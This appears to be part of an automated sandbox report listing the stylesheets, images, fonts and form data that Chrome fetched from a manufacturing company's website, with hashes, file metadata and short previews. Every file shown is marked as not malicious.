                                                                            SHA-256:B633A587C652D02386C4F16F8C6F6AAB7352D97F16367C3C40576214372DD628
                                                                            SHA-512:83BAFE4C888008AFDD1B72C028C7F50DEE651CA9E7D8E1B332E0BF3AA1315884155A1458A304F6E5C5627E714BF5A855A8B8D7DB3F4EB2BB2789FE2F8F6A1D83
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            URL:https://td.doubleclick.net/td/ga/rul?tid=G-R5P0JWVZEZ&gacid=1480583298.1732046721&gtm=45je4be0v882138962z89176964486za200zb9176964486&dma=0&gcd=13l3l3l3l1l1&npa=0&pscdl=noapi&aip=1&fledge=1&frm=0&tag_exp=101925629~102067555~102067808~102077855&z=737765295
                                                                            Preview:<html></html>
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:PNG image data, 1920 x 805, 8-bit/color RGB, non-interlaced
                                                                            Category:dropped
                                                                            Size (bytes):1432089
                                                                            Entropy (8bit):7.999009300295854
                                                                            Encrypted:true
                                                                            SSDEEP:
                                                                            MD5:EA55A1279E0674B831A9198DA02F2323
                                                                            SHA1:8F689875A028B8983F562CB00B96B38C3916C815
                                                                            SHA-256:AC74448418270AD35CCA91A509ABC6AF20A7CF5A0FFB79BC533065F9E19CB21E
                                                                            SHA-512:D0660A19EE88F102399D77A8FB4C9011D972AC32D9868B4BE34C48CA66EC6BEACBD841653E0C46A86E74B02CEABF9337010E3749D6F672571DB392550875471B
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            Preview:.PNG........IHDR.......%......^y.....IDATx..\...&......~..D..Lt`.(..w.t'...G.B.`....8.u.H<..I...fFR.....j.....G....`k.>..$I.V...3.....n..@k.o..y..|.kQ)O....<..).T.....'I.'...rHR...?...`$...-.G%....[(..#.v.K...r^..T......../.=s..3.k..Q..1..\.r....R3..>..Zk../..:(3..$)]G>..6..]..3.....,.1F.G..d....g;..l.......4..G.m..S...dU.EsD....]z..p3By..$..R.I....-..#2.:U..-gD4..z.<s7L*.r>....9..........9...I..3f.....y...G.R$3c...V.3.GP.U.FnW..x<.$}`.....A.8....OAr%~c.>1....En.H.J.|...9w.........&....O<...%.._..|.r...]...k.0.OIYY...|..H...9..$.....?3...e..`............5..K..^n=u&..l.....9r.yi..G{.....C....I.....i...L8.1=......*@.@..p".E.g...e...H*.e.]..'.bTG..3........_....,.a.. .c!..wn.*u....[.t...2~s......;..".J"..............@Q......[..cMo..*FU.\...O......-~g.H.34..../..}..q..f..%...9.})8T...J{...m.=....$.^..|@......$..=...)IW..a_..../7Y ..FG._IC..y..G*.p^?..13=..-..h+|..l......U.....`..^..>.....y..[.`l7['L....1.\z+s..n.9.F.Z./...U.........X
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (9828), with no line terminators
                                                                            Category:downloaded
                                                                            Size (bytes):9828
                                                                            Entropy (8bit):4.889830228645321
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:C451CBC950B61006668F0D73C5CEC416
                                                                            SHA1:F1F6CA913B2CE1C28AF2CB7EE3336EE04B36B44E
                                                                            SHA-256:BFFA21AB7FD19B0E7F57395FBCB6893B9E18757A081C216973DA973CD351F0DD
                                                                            SHA-512:8A868C7C5C81BEFFA685829D9C82A0568F31A26E2AF82F2EE9B24999BE0B0E8C0B2EEEAD4C20FDD1FC142E02FFC3164FA67339E46AA87C26034AAE7BC9E9FC04
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            URL:https://rocklandmfg.com/wp-content/themes/salient/css/build/blog/masonry-core.css?ver=17.0.3
                                                                            Preview:body .masonry-blog-item .mejs-container.mejs-video .mejs-controls{height:42px}#ajax-content-wrap .masonry-blog-item .mejs-container.mejs-video .mejs-controls .mejs-playpause-button{margin-left:10px}#ajax-content-wrap .masonry-blog-item .mejs-container .mejs-fullscreen-button{margin-right:10px}body .masonry-blog-item .mejs-container:not(.mejs-audio) .mejs-controls:before{height:250%}.post-area.masonry{width:1125px;margin-bottom:20px;margin-top:0;overflow:visible}.blog-fullwidth-wrap .post-area.masonry{margin-bottom:40px}[data-ext-responsive=false] .blog-fullwidth-wrap .post-area.masonry{width:auto}.vc_col-sm-3 .post-area.masonry,.vc_col-sm-4 .post-area.masonry{width:100%}body[data-ext-responsive=true] .post-area.masonry{width:100%}.post-area.masonry.span_9{width:834px;margin-right:5px}body[data-ext-responsive=true] .post-area.masonry.span_9,body[data-ext-responsive=true] .post-area.masonry.span_9.meta_overlaid{width:76.5%;margin-right:0}body.archive .meta_overlaid_blog.container-wrap,bo
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:RIFF (little-endian) data, Web/P image
                                                                            Category:downloaded
                                                                            Size (bytes):1101106
                                                                            Entropy (8bit):7.982300103956049
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:8FAFA114BC601571C401B3F0A2959FBF
                                                                            SHA1:FBD986365F134423D7AFC1ED08A4183B96876DE5
                                                                            SHA-256:F3BFB26751883DF7949B35D5ECFE292BF711C43800BCFB19529AAE0399A80DCC
                                                                            SHA-512:17CFB17C29AA9A4446D0107568D872A49FA32FFCFCC01A6746CDBEC44E92E6083AD86613FBD902FA08343C1DDF312D3B5736F1BAF931B674DB1E8ECA311C9977
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            URL:https://rocklandmfg.com/wp-content/uploads/2023/11/loaders-slider.png
                                                                            Preview:RIFF*...WEBPVP8L..../.....Hl.I.$DM.%...opU..=.D.............../...I...{../....K..vN.d.@ .<. 9.[.=..P...>..x..k.z.dm...%...e.... .rJ..a-...+9..?.....d{.p,...h.I.R{9&..cx.$A...j.z.j.$mU.V......@),ZJ.....fST....6.....hz....:...$.8,X.C.j..VT...,*..\..MZ..$.gd...4.Z(...j.4*...? ...j..Z.TP.&.!.Ams.1.[.j...NtT~g.-.r...x...:3.....T...x..y..$I..Z5o.w...Tg..$i.$.lw.h2.F=.jG5...q.I..d.....01..[0..j.n$i...#..%)o..=...S.KD......f.$G...?.}...&......6.`c#l..!..!.! .....P.@...B..!...!.A@.P.E......@.....!`cc.EQ.....F...J'...B(..!..&E...............B@.S....E1...(...L....@.>P..@(p....47n............+W.+......B...B.!...V6B..."......rK....\.....y..{^...W..@..>@/....B..h.4x.......hB..7. .j....?...H..............:..<5.c....?{...\i..!......88..?....HS...@..1...A..x..H........ ...*.....#.o.3....@#.N..|............E... ............N...,|.4(.ZQ:.........IA....J8sf.....|.*...A(......$Z.X(..S>^.....{..3.,.x.........&+.b....V...0A..`a...@...............091YL,Y.y.l.`.......w..(.Z+
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:RIFF (little-endian) data, Web/P image
                                                                            Category:downloaded
                                                                            Size (bytes):498
                                                                            Entropy (8bit):7.512938656295629
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:CF571785A797AC385BFCC1ED033AE587
                                                                            SHA1:5FA769B620469B9A08887B616F219248C2F11F1D
                                                                            SHA-256:ADBE9B95B46A26D560A48BB6BBE3240574084C6F0C43E9B3C5C3724B69E16048
                                                                            SHA-512:7241946661B0B08A4299B0792C34D7274FAD858513C759774F5320072F3385DD2A9E1A4497EB7434223003A7404BA734668E3A7B73D792CC4E47B9C47FDBD33E
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            URL:https://rocklandmfg.com/wp-content/uploads/2023/09/tractor-dark.png
                                                                            Preview:RIFF....WEBPVP8L..../c....`.m..Wa.?..0...0...d.m..Wa.?..@$.$.....f.qw.i.m......$.Faq...l.di.D..L...k..~kD........U+o....[XK...$T3...o5.''k.[1..$..P.*...U..$.[...0...A..Ce8... .7_.x...U.....:...V.)&...x..w.19..XN.l...Q.}.W.E..I.@....A.@."(..q.+......$.[C.aM.[...on6.. .C.._...|.qq.&.+...r.+&.+...O..dD/w/..hV.j.>.A.......^.m..s....q..qB..q.*..S..`y......8........c.1F.Vt....... "j....:.E.=...s.;...N..2..V./.b.I...W.U7..M...bh_-.............M...E.`..7.z.w5:X.>H.S.#...?.|......
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:Web Open Font Format (Version 2), TrueType, length 48236, version 1.0
                                                                            Category:downloaded
                                                                            Size (bytes):48236
                                                                            Entropy (8bit):7.994912604882335
                                                                            Encrypted:true
                                                                            SSDEEP:
                                                                            MD5:015C126A3520C9A8F6A27979D0266E96
                                                                            SHA1:2ACF956561D44434A6D84204670CF849D3215D5F
                                                                            SHA-256:3C4D6A1421C7DDB7E404521FE8C4CD5BE5AF446D7689CD880BE26612EAAD3CFA
                                                                            SHA-512:02A20F2788BB1C3B2C7D3142C664CDEC306B6BA5366E57E33C008EDB3EB78638B98DC03CDF932A9DC440DED7827956F99117E7A3A4D55ACADD29B006032D9C5C
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            URL:https://fonts.gstatic.com/s/opensans/v40/memvYaGs126MiZpBA-UvWbX2vVnXBbObj2OVTS-muw.woff2
                                                                            Preview:wOF2.......l......D...............................O..B..h?HVAR.x.`?STAT.$'...0+...|.../V........+..2.0..6.6.$..`. ..~......[B4q.....t..P.M_.z...1..R.S*...u.#..R....fR.1.N.v.N.P...;.2........!Z......Qs...5f.G.K.an2&....2...*......C.H.t..N!.....nh.<(.vN.....j.._.L.P.t..Ai.%.............._I.i,..o,C.].H.X9.....a.=N....k.....n.L..k.f.u..{...:.}^\[..~5...Z`...........`!...%4..,...K0..&.a/....P....S....m.Z......u...D.j.F...f.0`I.`.`.h#..)(FQ.F!o$........S.).MV8%Rh...r...x...T]$.=......Y...!.3.&U..."....Q....{.l/0..d..4iJ/..}...3....i[Z..NG.WD...>.[U..Q.h..@m.=..S...1C2...d...<..v.?.q.f..n...OUz.....&Z......Z."..N.....n...9.B..C..W....}...W..6Zs.i.+Z........jB.n..x.8M.....q..@I....-.%..,C,..K..#.2...4)/.v_..x.<....t.....%[.4?.=j.V..jj''..W.u..q....I.L.=......E...\.M.7{.>......W........C.`...,9$......\..o........y...4A..m.P.,X..=?.:................wF`..+.P..........M!.4.......l.>M..t.ff5r..^..Z.g...!fA,hIIQ...e.R>B.AH.VuX..>..\.=.ky...1>C....>C.c.;...6D.
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:PNG image data, 300 x 300, 8-bit/color RGBA, non-interlaced
                                                                            Category:dropped
                                                                            Size (bytes):27273
                                                                            Entropy (8bit):7.980191396948483
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:44A125AE84BBFC20CA4E4BCDB3CCC1AE
                                                                            SHA1:8EB40E5D3C3A431D9A6A00CE9D85BE84348A7C45
                                                                            SHA-256:71316279A75A1DDDC555E8C78520922BEFF5F0A696D46C6DB81BF2D0A25A2118
                                                                            SHA-512:B230EC5985ECEA1E4B29EF576C9CA1003D72F162A6A69B7750D98708242AF207AFCC5832A42623D85C6EFD24EBA8D3BBDB5DDEDD5BEA6F757CBDF14517D7D359
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            Preview:.PNG........IHDR...,...,.....y}.u..jPIDATx...;j.a........O....;.l.kp.6..;.a%X...23.C...{.Rk#.\Wu..............................................................;..............vu.......~.w.....0V.T.......?9.|{s.....eZ..d.6......T..j.z..}...v.d.Z.2....3.6}..V....L..`X..17.m.y......i.....:...T.7.I[.e...EU;.w....i...-.ZU.WV}.....l....!....g.....k.O/f....O^?....Q.Q..{g...H..C".*.h.-.../...J.D.-...E....M...."(.Q %.dw...=^..}..\...@..D.9.s^..?:.....$Z.g.y.s-.1....*.%.B.H.C....!;.x.X.S&`.)....VV....4.**.IIU..p.........z,..`...._.dr.h.]....X..].r.AAB.h*i"!...........[..8.t#IS@.&...PU...BQ9....C.W....)zm..Tu......../a..xV..........vAm...U0....P..-..TB!0.phr{.n... 33.C.....r....j\.......t..kW>D..Q.L.....'....~.t)...O.:.....8$q.t6...B.......s.k......%.c....x.(....A82.^.;.A.t i.hDhjBi....[.U...p....go..F.A.......e .O..;H...O..H....w.l....E.5........N70u[U.....+x.M#T.d. H.@)..X...F.2..&.I.E.=W.......X../F3.OCR....?T._.?...zm....7...?_..S..cd.w'..8x.
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (39480), with no line terminators
                                                                            Category:downloaded
                                                                            Size (bytes):39480
                                                                            Entropy (8bit):4.9568345215492835
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:D9C7799E0F3D872137F00A2F7B9F4DBF
                                                                            SHA1:6D32B7E632B6A2D79E3A36304CC0A9E94E0D2522
                                                                            SHA-256:87C6A9281C6C209F6DA52AD287378B8E48E7B8215CF60C3B8A183742198DCD70
                                                                            SHA-512:02DAEE855E46B40F5B270B10EC8B1CF1C709735DBC2485C1BFAF9566859469F49115663A6AC9871910EFD2D2BE5F72A2006DEC7D7D4A1BE7CB1EA0507542E1DA
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            URL:https://rocklandmfg.com/wp-content/themes/salient/css/build/responsive.css?ver=17.0.3
                                                                            Preview::root{--mobile-container-width:88%}@media only screen and (min-width:1300px){.container,.post-area.standard-minimal.full-width-content .post .inner-wrap{max-width:1100px}}@media only screen and (min-width:1000px) and (max-width:1300px){#author-bio #author-info{width:544px}#project-meta ul li .nectar-love-wrap.fadein{margin-right:11px;padding-right:11px}#page-header-bg .span_6 .subheader{font-size:24px}#boxed .nectar-slider-wrap[data-full-width=false] .swiper-slide .content h2,.nectar-slider-wrap[data-full-width=false] .swiper-slide .content div.ns-heading-el,.nectar-slider-wrap[data-full-width=false] .swiper-slide .content h2{font-size:32px;line-height:50px}body .swiper-slide .content p{font-size:20px;line-height:34px}.nectar-slider-wrap[data-full-width=false] .swiper-slide .content p{font-size:14px;line-height:24px}.portfolio-items:not(.carousel) .col .work-item.style-2 i{line-height:32px;height:32px;width:32px;font-size:14px}#top nav>ul>li>a{padding-left:8px}.sf-sub-indicator{left:6p
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:RIFF (little-endian) data, Web/P image
                                                                            Category:downloaded
                                                                            Size (bytes):418
                                                                            Entropy (8bit):7.293416857295623
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:A10C021D6AF1FAEBCC47CF55364A50E5
                                                                            SHA1:779889D020951325983084229C30FB978B144132
                                                                            SHA-256:C2BF0D537F38CEDD6AA3D3994CDEC07FE49FEFE4C9C11BAED1713DBF5B79CE63
                                                                            SHA-512:881BD6D1AD32B211F97169001FC16B47E28F1AB5365DBDB7E781DC1B98D2BDC9BA9FC31CFD3D4ADA4198DA30E36C6EEEF35EF5B952663DD088B4CBDC41ADABFC
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            URL:https://rocklandmfg.com/wp-content/uploads/2023/10/linkedin.png
                                                                            Preview:RIFF....WEBPVP8L..../......(.........#..."Ij...WI.:rP.IR....J....F....=......@.1......Z..N.9'.^J)...cp..J....5z.D..^.. D.....A.........o...w.{..=3.....'...a.RJ.....m+.{...n..w.<..AD.'....P.I1.....N.......L......B...[r..^tO.D~....7..6.^r .....l.'.b.2...^t.....3u"..U.x..p-......(.N.......%.'.z...6A.cf[t,.< R9.Z>..o.LI.e.z'....%./.!Y.JD...m.......m..0..W.p~..0..Iz.MdwR.7z...Z~".[3....&.....z.:
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:SVG Scalable Vector Graphics image
                                                                            Category:dropped
                                                                            Size (bytes):2961
                                                                            Entropy (8bit):4.997493078609595
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:FD84E4F616DCC99534FBA82BCD9A5F1A
                                                                            SHA1:886796A16D21C3FBCE320D1E40C7CEDA29155A51
                                                                            SHA-256:2EE99885E3C076F05D7EBB7A7BBBA56AF11E6E94BB34EB4492EA0F535DCBA021
                                                                            SHA-512:1BD960F306DE0259D26424C1F4DA3E1B26DD0E29DF8D7EB4AE1F0287D837A036D67F6D6DC590F13638C84798C7E8FB9B15EED54D47F28F3E06A22590218D580C
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            Preview:<svg xmlns="http://www.w3.org/2000/svg" style="background:transparent" width="51" height="51" viewBox="0 0 100 100" preserveAspectRatio="xMidYMid" ><style><![CDATA[.B{fill:#0a0a0a} </style><g class="B"><rect x="47" y="24" rx="3" ry="3.36" width="6" height="12"><animate attributeName="opacity" values="1;0" keyTimes="0;1" dur="1s" begin="-0.9166666666666666s" repeatCount="indefinite"/></rect></g><g transform="rotate(30 50 50)" class="B"><rect x="47" y="24" rx="3" ry="3.36" width="6" height="12"><animate attributeName="opacity" values="1;0" keyTimes="0;1" dur="1s" begin="-0.8333333333333334s" repeatCount="indefinite"/></rect></g><g transform="rotate(60 50 50)" class="B"><rect x="47" y="24" rx="3" ry="3.36" width="6" height="12"><animate attributeName="opacity" values="1;0" keyTimes="0;1" dur="1s" begin="-0.75s" repeatCount="indefinite"/></rect></g><g transform="rotate(90 50 50)" class="B"><rect x="47" y="24" rx="3" ry="3.36" width="6" height="12"><animate attributeName="opacity" values=
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:JSON data
                                                                            Category:downloaded
                                                                            Size (bytes):15335
                                                                            Entropy (8bit):4.881001798488339
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:A88CD7591DF0F971FFB4F80B9B06C037
                                                                            SHA1:C09E44C32D13AAF9A7809F4B5A61328809078246
                                                                            SHA-256:C08220D88DB4A81DE01F0921CA8E9C892D605937EE44BE73D2F11A6940FFA47C
                                                                            SHA-512:0AC7E29931369DDC6C79B09D52CB926A12B82DC564F1EC8E122EA3CF1E41D384627B2183D70790284EDEE850EB607B1CDC9FB3FBD46837E67182F7FB8D3FC65E
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            URL:https://mktg.rocklandmfg.com/acton/openapi/form/v1/45001/3422661f-ddc6-4d65-9189-9cb98bb9d442:d-000c?ts=1732046704901
                                                                            Preview:{"watchFields":["b1668026547775","b1676389256155","b1668026547775","b1676389256155","b1668026547775","b1668026547775","b1676389256155"],"processedTemplate":"<style type=\"text/css\">\n\n#ao-form-3422661f-ddc6-4d65-9189-9cb98bb9d442.ao-form input, .ao-form textarea, .ao-form select{\n\tbackground-color: #F0F0F0;\n border-color: #CCCCCC;\n\tborder-width: 1px;\n color: #2F2523;\n font-size: 12pt;\n font-family: 'Helvetica Neue', Helvetica, Arial, sans-serif;\n}\n\n#ao-form-3422661f-ddc6-4d65-9189-9cb98bb9d442.ao-form input:focus, .ao-form textarea:focus, .ao-form select:focus{\n border-color: #CD5E13;\n}\n\n#ao-form-3422661f-ddc6-4d65-9189-9cb98bb9d442.ao-form input.ao-form-error, .ao-form textarea.ao-form-error, .ao-form select.ao-form-error{\n\tborder-color: #CD5E13;\n border-width: 1px;\n}\n\n#ao-form-3422661f-ddc6-4d65-9189-9cb98bb9d442.ao-form span.ao-form-error-message{\n\tcolor: #CD5E13;\n\tfont-size: 11px;\n}\n\n\n#ao-form-3422661f-ddc6-4d65-9189-9cb98bb9d
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (21942), with no line terminators
                                                                            Category:downloaded
                                                                            Size (bytes):21942
                                                                            Entropy (8bit):5.243875672867386
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:3BB8971E804538794FDC9903C1CC2089
                                                                            SHA1:ADB6E2513B596E7C6E6C2F66CAB08FA5BB4F670B
                                                                            SHA-256:809FFC978956891F074AE8681B444C4C8DF927FC37DCC023C3F77C3BA0A4F25D
                                                                            SHA-512:372191563C4ED1163F27B747465375D81643757FAF70D68C5EE42852DF40F0F83C8D6ABA11532F984DCB3BE3D98E07DD15840F89142FC428BF9EA42E2566BAD6
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            URL:https://rocklandmfg.com/wp-content/themes/salient/css/build/grid-system.css?ver=17.0.3
                                                                            Preview:.col{position:relative;display:block;width:100%}.full-page-inner>.container>.span_12,.full-page-inner>.span_12,html body .vc_row-fluid>.span_12{display:flex;display:-ms-flexbox;-ms-flex-wrap:wrap;flex-wrap:wrap;float:none}@media (min-width:691px){.col{margin-right:2%}}.col:last-child{margin-right:0}.col.col_last{margin-right:0}.compose-mode .vc_row-fluid>.span_12>.vc_element,.compose-mode .vc_row-fluid>.span_12>.vc_element>.wpb_column,.full-page-inner>.container>.span_12>.wpb_column,.full-page-inner>.span_12>.wpb_column,html body .vc_row-fluid>.span_12>.wpb_column{float:none;margin-right:0}.compose-mode #nectar_fullscreen_rows .full-page-inner>.container>.span_12>.vc_element:not([class*=offset-]),.compose-mode .vc_row-fluid>.span_12>.vc_element:not([class*=offset-]),.compose-mode .vc_row-fluid>.span_12>.vc_element>.wpb_column:not([class*=offset-]),.full-page-inner>.container>.span_12>.wpb_column:not([class*=offset-]),.full-page-inner>.span_12>.wpb_column:not([class*=offset-]),html body
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (31038), with no line terminators
                                                                            Category:downloaded
                                                                            Size (bytes):31038
                                                                            Entropy (8bit):5.013098850627362
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:485A8B5F00478A5842D4A52182DF02BF
                                                                            SHA1:7E8D94117F10D719B9D56CAAE87AE92735B81993
                                                                            SHA-256:ED189AC4E38DFA206BBFB9A37547D1843811270A9E229E39C6077BEE6BFF210F
                                                                            SHA-512:168A0A4BA61E833770CF913B057018DE91D0F1C63D7AA227D1E9CA316753AB26DAAE6C4E6BA3B8999C9259793B6A92CD88A148544D42477F4CC628A1F102C9C5
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            URL:https://rocklandmfg.com/wp-content/themes/salient/css/build/third-party/woocommerce/woocommerce-non-critical.css?ver=17.0.3
                                                                            Preview:.cart-menu .cart-icon-wrap .icon-salient-cart{-webkit-transition:color .2s ease;transition:color .2s ease}body[data-form-style=minimal].woocommerce form .required{-webkit-transition:color .2s cubic-bezier(.39,.71,.56,.98);transition:color .2s cubic-bezier(.39,.71,.56,.98)}.product.open-nectar-quick-view{transition:opacity .3s ease}.single-product .product[data-n-lazy="1"][data-gallery-style=left_thumb_sticky] .product-thumbs .thumb img{transition:border-color .1s ease,opacity .5s ease}.single-product .product[data-n-lazy="1"] .product-thumbs .flickity-slider .thumb img.nectar-lazy,.single-product .product[data-n-lazy="1"] img.nectar-lazy{transition:border-color .1s ease,opacity .5s ease}#header-outer:not([data-format=left-header]) #top nav>ul>li:not(.megamenu) .cart_list a:hover{background-color:transparent!important}#header-outer .widget_shopping_cart a.button:hover,.nectar-slide-in-cart .widget_shopping_cart a.button:hover{background-color:#333!important}.woocommerce #respond input#s
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (25646), with no line terminators
                                                                            Category:downloaded
                                                                            Size (bytes):25646
                                                                            Entropy (8bit):4.947699015731433
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:45E001E9A476BC6AA8312923EE953B5A
                                                                            SHA1:0A6E5B6414E4FC559CE0C4ACCFADFCD2F27DF913
                                                                            SHA-256:2AF9B4FEC27508B453812D713AB62650F4F46F85AD2DC92BF910C0253126D6EF
                                                                            SHA-512:EEFF6A069222591042E42CFED5240E970AB4B101255FAEACF3D27939DF49376C4FD8079D14EEB095748DCBD90A16DAC492E5B14C9540BFDD126CF08FD6117691
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            URL:https://rocklandmfg.com/wp-content/themes/salient/css/build/style-non-critical.css?ver=17.0.3
                                                                            Preview:#header-outer[data-lhe=animated_underline] #top nav>ul>li>a{transition:color .2s ease}.sf-menu>li>a>.sf-sub-indicator i{transition:color .2s ease}.sf-shadow .sf-shadow-off{background:none repeat scroll 0 0 transparent}#header-outer:not([data-header-resize="1"]):not([data-format=left-header]) #logo img{transition:opacity .2s ease}#header-outer[data-using-secondary="1"]:not([data-format=left-header]){transition:transform .32s ease,background-color .3s ease 0s,box-shadow .3s ease 0s,margin .25s ease}#top nav ul #nectar-user-account a span,#top nav ul #search-btn a span{-webkit-transition:color .2s ease;transition:color .2s ease}#top ul .slide-out-widget-area-toggle a i.label{-webkit-transition:color .2s ease;transition:color .2s ease}#header-outer:not(.no-transition) .nectar-menu-icon.svg-icon svg path,#slide-out-width-area .nectar-menu-icon.svg-icon svg path{transition:fill .2s ease}#header-outer header .sf-menu>li.nectar-regular-menu-item>a>.nectar-menu-icon{transition:color .2s ease}#h
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=1, software=Google], baseline, precision 8, 92x92, components 3
                                                                            Category:downloaded
                                                                            Size (bytes):6335
                                                                            Entropy (8bit):7.9256806687226895
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:9C3A8EEEF07B5B70CAC893D862C9B84C
                                                                            SHA1:136E907E6EF4609BD9029A51A5B3CF6D124DFC12
                                                                            SHA-256:709904090B6D24F4A89085BA50FCE1CF7CBDD80D911B1F85737A610BED426598
                                                                            SHA-512:41995F275020F018ADB963657FABDC4C16FB856276E89EBC2C65A6A5F2010CF57E2EEF4329FDB66E530E01E3B4E8B7D5F684DB26F9CCA2C39046C432E537605A
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            URL:https://lh5.googleusercontent.com/p/AF1QipNvxxLtnrfT5TVVrfrwy7c-ibQarx3PLriOXn4e=w92-h92-n-k-no
                                                                            Preview:......JFIF.............*Exif..II*.......1...............Google..............................................................................................................................................\.\............................................@.......................!.....1"AQ..#2aq....3B.b.......$DRSTr..................................6......................!.1A..Qaq."........2b..#r...3B............?.A.~....KG.C\...J..@a2..L.66...e............3.`...p`..?..(..I.T}1l@.+...QW.........#...'.;.#.mhc.Q#B...%...U.... .V.m3U.'r..s...%....zz.e@.....f.X...-.$.7Q.k...N..2.I..A..t.....a[...S....4..}.x.N.t.J]./QH.....d...*..@`..Y\..;....K....E.k..Y<%.M. ..g.x..>E..........f;..q.]....xu./.s..P,....J.u.w...h..X...0q.*^E7.X...nO.W{.F.).W.s3.++.Y.t./.c.m..).i..H.j%y.*owZi$D.:y$g.VVbY..#n..l.i....%G....u.|:..%.%K.b...U.'.gETgtK.#d...E..:.o8..T..-.....}V.3a.I.]..`..)F"Sf=FR.....\...@$.."Fb.F....wH><..>h....(..N..t.#&.-....X.....=....56..&.!.s....Zm.....$.....8.u....H`E.+.!f
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:PNG image data, 170 x 65, 8-bit colormap, non-interlaced
                                                                            Category:downloaded
                                                                            Size (bytes):1269
                                                                            Entropy (8bit):7.735791875506492
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:F35E8FA4FC39D425FE5C9EE89EF18A13
                                                                            SHA1:91D49D34703A38E854AEE484845FEC91C525D91E
                                                                            SHA-256:B971EFC455C8D4DC91E92C5F2092DFC3307D28080563770922493DEABD44ACEC
                                                                            SHA-512:669F06ED9DD96C6084A5D9E025B1B0221EDCCCCD6C8A1F4277BF7F8F9B3413C8A09F271670E2AA6B40795015614B609B021BD1317D7EB6EA98A8473CF9289C10
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            URL:https://rocklandmfg.com/wp-content/uploads/2023/02/xcmg.png
                                                                            Preview:.PNG........IHDR.......A.....v+.....EPLTE...>>>;;;<<<:::999888888555777555555444..............{{{bbbJJJ444(((h.mG....tRNS........#&)-03333333333.hH....HIDATx...v.*.......D.....`@x.j....qkk[H.*NNNNNNNN>...!h.. .Wh..8....{<5..U.I}..JM...5}....,..........R..+.?Qj...L.$...0H.=5r..J...5#.e-.......}c..P.,4..=....0.Q.....e.............e...H.q.@..b.8.tH..0H.....`.".>.|v.@?x..i$.....0.n.h..Njz....{bR!.y1....B.......Z..38..h..I..=..e`...D.%U.D.....2..........)..P...w..h...r..^j....,....$</.. .8K;....2B.l.>...'B.v.|nES..L.....i....[s&...*...j.\.e.T......}..]..RsR.B3..,f....F..:...V..F..>..N..&........T..c.jKx....}...Z.&.......3.._i`v..q.Y...ts.....A...4..03..f......*.(....'.U.2.R4$.&.>T....J.......59Q......H[.X.._.o..mu.V.Pu]l...9...jhD.y(e..a..i)5...jPZ.aI.:dy.......J7v.KU....?..s~?..J.!.p<i.;..g"....1mJ.H..<:h$...u.....AxwVX..n.c\......V..B.....,O....?D..8>,....a.YA0.....~...m.R.X.;....:Q...~O.{.F.~.....F...{.C,.r.X.2...U*.X..3..>.....N.#.d..Bu
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text
                                                                            Category:downloaded
                                                                            Size (bytes):2466
                                                                            Entropy (8bit):5.376309478032406
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:41DBCFB6281C26E5593874EEAE67B771
                                                                            SHA1:DFA63B96A291B998EC06086BB4B2BBD6B9C8D12E
                                                                            SHA-256:C2E14CC26E7A4AA6540367AFE07FF37FA401A3AF48F6A730A8B5A12C6202CC8E
                                                                            SHA-512:2E177D6D91520954C2F6353FCF39FC9D6310CC88FE3E71C8BF214515F4F7FC0A138F0E4E44AFD682FA6D8CBBA01957CBA9AA931435526718AE4F3EAFFA6D625D
                                                                            Malicious:false
                                                                            Reputation:unknown
